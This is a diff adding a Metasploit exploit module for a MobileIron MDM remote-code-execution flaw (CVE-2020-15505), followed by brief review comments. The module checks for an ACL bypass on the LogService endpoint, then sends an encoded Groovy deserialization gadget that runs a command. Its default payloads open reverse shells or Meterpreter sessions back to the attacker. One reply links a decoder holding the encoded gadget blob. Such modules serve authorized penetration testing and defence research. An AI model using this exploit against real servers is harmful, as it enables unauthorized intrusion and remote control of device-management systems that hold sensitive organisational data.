modules/exploits/linux/http/mobileiron_mdm_hessian_rce.rb

```diff
@@ -0,0 +1,147 @@
+          ['URL', 'https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html'],
+          ['URL', 'https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505']
+        ],
+        'DisclosureDate' => '2020-09-12', # Public disclosure
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    # http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Call
+    res = send_request_hessian('c')
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    unless res.code == 200 && res.headers['Content-Type'] == 'application/x-hessian'
+      return CheckCode::Safe('ACL bypass failed.')
+    end
+
+    CheckCode::Vulnerable('ACL bypass successful.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    send_request_hessian(groovy_gadget(cmd))
+  end
+
+  def send_request_hessian(data)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mifs/.;/services/LogService'),
+      'ctype' => 'x-application/hessian',
+      'headers' => {
+        'Referer' => 'https://github.com/rapid7/metasploit-framework'
+      },
+      'data' => data
+    )
+  end
+
+  def groovy_gadget(cmd)
+    # http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers
+    hessian = "c\x01\x00H\x00\x03MSF"
+
+    # Cale hates me for this
+    hessian << Rex::Text.zlib_inflate(Rex::Text.decode_base64(
```

Comment:
Seems legit.

Reply:
Lmao. Hey, it's self-contained...

Reply:
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Zlib_Inflate(0,0,'Adaptive',false,false)&input=ZU5wRmowMVB3a0FRaGtjUkJVejhDQmU5Y2ZWZytRM1lZREJLSVM3aDRtbmJqdTJTM1c0enV5MjB2OTVCUVM2YmZYZmZQUFBNCjNBUE1QUXd6c3JadWdzb3JIVXgzcFN4U0srQWUvMjVMc2lXU1YraTRDZ0o2dVhSNWFGUGsrR1FwQ3hLKzU3Snl3UUZEVmVHVgp3V0NPUHJkcHFLMnJDQVZjbXQ4c29PdThKQy9nbHRCWlhhUHdKRDFtelJ2QW50OVBGV0hpVlkySGgwY2pkOHBVSnFwTWpMVDQKWGtxU3pFSnloMEl2UlkwWk05am9ZU05yR1doWlpBR0xKK2pjUzZWMGlpUmdTUGlIbmhKWjRxa296YXVBcThRYXc0dXVOY002Cm5NZXhLc1l1RjNEK25MRGxiQksrajFhejZXajVNWW1tcS9iZjBGSVRDYmpHb2xaa0M0T0Y1OWcvRG5FUk43dDJXeUI5TXZoQwp3TURueWkzaURYOXk4YVk4cnJGcVNuUnJEM2RmSi9kUVMrZjJRc0NVVHB4c283WnQ5NXl6MDlFT2ZnQ21LbzFr